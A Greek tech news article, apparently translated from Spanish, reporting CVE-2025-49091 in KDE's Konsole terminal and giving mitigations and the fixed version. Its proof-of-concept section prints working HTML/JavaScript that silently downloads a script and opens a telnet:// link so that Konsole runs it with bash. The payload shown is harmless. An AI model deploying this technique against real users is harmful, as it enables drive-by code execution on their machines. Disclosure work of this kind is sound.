Σοβαρή ευπάθεια στο Konsole επιτρέπει την εκτέλεση κώδικα απλώς ανοίγοντας μια ιστοσελίδα

Ευπάθεια

Πριν από λίγες μέρες κυκλοφόρησαν πληροφορίες για κρίσιμη ευπάθεια, το οποίο αναγνωρίστηκε ως "CVE-2025-49091«. Αυτή η ευπάθεια ανακαλύφθηκε στο Κονσόλε (ο εξομοιωτής τερματικού KDE), επιτρέπει την απομακρυσμένη εκτέλεση κώδικα απλώς με την επίσκεψη σε μια κακόβουλη ιστοσελίδα από ένα πρόγραμμα περιήγησης.

Αναφέρεται ότι αυτό το πρόβλημα επηρεάζει συστήματα όπου το KTelnetService και μια ευάλωτη έκδοση του Konsole είναι εγκατεστημένα, αλλά τουλάχιστον ένα από τα προγράμματα telnet, rlogin ή ssh δεν είναι εγκατεστημένο. Η ευπάθεια βρίσκεται στην κονσόλα του KDE Terminal Emulator. Όπως σημειώνεται στο συμβουλευτικό δελτίο του KDE, οι εκδόσεις Konsole πριν από την έκδοση 25.04.2 είναι ευάλωτες.

Η Konsole υποστηρίζει τη φόρτωση URL από ελεγκτές σχήματος όπως
telnet://URL. Αυτό μπορεί να εκτελεστεί ανεξάρτητα από το αν το telnet
Το δυαδικό αρχείο είναι διαθέσιμο.

Σε αυτήν τη λειτουργία, η Konsole είχε μια διαδρομή όπου, εάν το Telnet δεν ήταν διαθέσιμο,
θα χρησιμοποιούσε ξανά το bash για τα παρεχόμενα ορίσματα· το οποίο
είναι η παρεχόμενη διεύθυνση URL. Αυτό επιτρέπει σε έναν εισβολέα να εκτελέσει αυθαίρετο κώδικα.
κώδικας.

Τα προγράμματα περιήγησης συνήθως εμφανίζουν ένα μήνυμα όταν ένας χρήστης ανοίγει ένα εξωτερικό πρόγραμμα περιήγησης.
Ελεγκτής σχήματος που μπορεί να φαίνεται ύποπτος και να απαιτεί αλληλεπίδραση χρήστη
να είναι εκμεταλλεύσιμο.

Η πηγή του προβλήματος: KTelnetService και επικίνδυνα σχήματα URL

Οι ερευνητές σημειώνουν ότι το πρόβλημα πίσω από αυτό το θέμα ευπάθειας έγκειται στη συμπεριφορά της υπηρεσίας KTelnetService, η οποία περιλαμβάνεται από προεπιλογή στο KDE. Αυτή η υπηρεσία είναι υπεύθυνη για την επεξεργασία των σχημάτων URL telnet://, rlogin:// και ssh:// και έχει σχεδιαστεί για να ανοίγει αυτούς τους συνδέσμους απευθείας στο Konsole χρησιμοποιώντας τα αντίστοιχα βοηθητικά προγράμματα (telnet, rlogin ή ssh).

Ωστόσο, το ελάττωμα παρουσιάζεται όταν αυτά τα βοηθητικά προγράμματα δεν είναι εγκατεστημένα στο σύστημα. Σε αυτήν την περίπτωση, η Konsole, όταν επιχειρεί να εκτελέσει την εντολή που υποδεικνύεται στον σύνδεσμο, χρησιμοποιεί το /bin/bash ως υποκατάστατο. Επομένως, ένας εισβολέας μπορεί να κατασκευάσει έναν προσαρμοσμένο σύνδεσμο.

Αν και αυτό φαίνεται ασήμαντο με την πρώτη ματιά, το πρόβλημα επιδεινώνεται επειδή ο εισβολέας μπορεί να εκτελέσει οποιοδήποτε αρχείο στον κατάλογο λήψεων του χρήστη χρησιμοποιώντας την προσαρμοσμένη εντολή. Με άλλα λόγια, οποιοδήποτε αρχείο εκτελείται αυτόματα εάν ο χρήστης κάνει κλικ σε έναν σύνδεσμο με αυτό το σχήμα.

Γιατί είναι τόσο επικίνδυνο αυτό;

Τα σύγχρονα προγράμματα περιήγησης όπως το Firefox και το Chrome (στις προεπιλεγμένες ρυθμίσεις τους) αποθηκεύουν αυτόματα τα ληφθέντα αρχεία στον φάκελο ~/Downloads, χωρίς να απαιτείται επιβεβαίωση από τον χρήστη. Εμφανίζουν μια ειδοποίηση μόνο αφού ολοκληρωθεί η λήψη.

Αυτή η συμπεριφορά, σε συνδυασμό με το γεγονός ότι σε συστήματα Linux είναι δυνατή η πρόσβαση στην τρέχουσα διαδρομή καταλόγου του προγράμματος περιήγησης, επιτρέπει την εκτέλεση ενός αυτόματα ληφθέντος κακόβουλου αρχείου από το Konsole χωρίς να το γνωρίζει ο χρήστης.

Απόδειξη Ιδέας (PoC): Πώς αξιοποιείται η ευπάθεια

Για να καταδείξουν τον κίνδυνο του ελαττώματος, οι ερευνητές δημιούργησαν το ακόλουθο απόσπασμα κώδικα JavaScript, το οποίο δείχνει πώς ένας εισβολέας θα μπορούσε να εκμεταλλευτεί αυτό το κενό ασφαλείας από μια ιστοσελίδα:

<html>
<head>
<script type="text/javascript">

function downloadAndRedirect() {
const anchor = document.createElement('a');
anchor.href = "data:;base64,ZWNobyAiSGVsbG8gd29ybGQiCnRvdWNoIC90bXAvZm9vYmFyCg==";
anchor.download = 'evil';
document.body.appendChild(anchor);
anchor.click();
document.body.removeChild(anchor);

setTimeout(() => {
window.location.href = "telnet:///proc/self/cwd/Downloads/evil";
}, 1000);
}
</script>
</head>
<body onload="downloadAndRedirect()">
</body>
</html>

Στον Firefox και το Chrome, εάν ο χρήστης αποδεχτεί τον σύνδεσμο telnet://, θα ενεργοποιηθεί το ακόλουθο:

/usr/bin/konsole --noclose -e telnet /proc/self/cwd/Descargas/evil

Και, εάν το telnet δεν υπάρχει, το κακόβουλο σενάριο θα εκτελεστεί με bash.

Προσωρινά μέτρα μετριασμού

Ενώ περιμένετε την ενημέρωση κώδικα ή αν δεν μπορείτε να ενημερώσετε αμέσως, υπάρχουν δύο απλοί τρόποι για να μετριάσετε το πρόβλημα:

Εγκαταστήστε τα βοηθητικά προγράμματα telnet, rlogin και ssh

Εάν υπάρχουν αυτά τα βοηθητικά προγράμματα, το Konsole θα τα καλέσει σωστά και δεν θα καταφύγει στο bash. Αυτό αποτρέπει την εκτέλεση αυθαίρετου περιεχομένου ως script.

sudo apt install telnet rlogin openssh-client

Διαγραφή του αρχείου υπηρεσίας KTelnetService

Μπορείτε να διαγράψετε το αρχείο που είναι υπεύθυνο για την καταχώριση αυτών των σχημάτων:

sudo rm /usr/share/applications/ktelnetservice6.desktop

Αυτό θα αποτρέψει την αυτόματη διαχείριση των συνδέσμων telnet://, rlogin:// ή ssh:// από την Konsole.

Λύση: Επείγουσα ενημέρωση στο Konsole 25.04.2

Το θέμα ευπάθειας έχει διορθωθεί στην έκδοση 25.04.2 του Konsole, η οποία περιλαμβάνεται στην ενημέρωση 25.04.2 του KDE Gear. Συνιστάται θερμά σε όλους τους χρήστες και τους διαχειριστές συστημάτων να κάνουν άμεση ενημέρωση.

Τέλος, εάν ενδιαφέρεστε να μάθετε περισσότερα για αυτό, μπορείτε να συμβουλευτείτε τις λεπτομέρειες στο παρακάτω σύνδεσμο.


Αφήστε το σχόλιό σας

Η διεύθυνση email σας δεν θα δημοσιευθεί. Τα υποχρεωτικά πεδία σημειώνονται με *

*

*

  1. Υπεύθυνος για τα δεδομένα: Miguel Ángel Gatón
  2. Σκοπός των δεδομένων: Έλεγχος SPAM, διαχείριση σχολίων.
  3. Νομιμοποίηση: Η συγκατάθεσή σας
  4. Κοινοποίηση των δεδομένων: Τα δεδομένα δεν θα κοινοποιούνται σε τρίτους, εκτός από νομική υποχρέωση.
  5. Αποθήκευση δεδομένων: Βάση δεδομένων που φιλοξενείται από τα δίκτυα Occentus (ΕΕ)
  6. Δικαιώματα: Ανά πάσα στιγμή μπορείτε να περιορίσετε, να ανακτήσετε και να διαγράψετε τις πληροφορίες σας.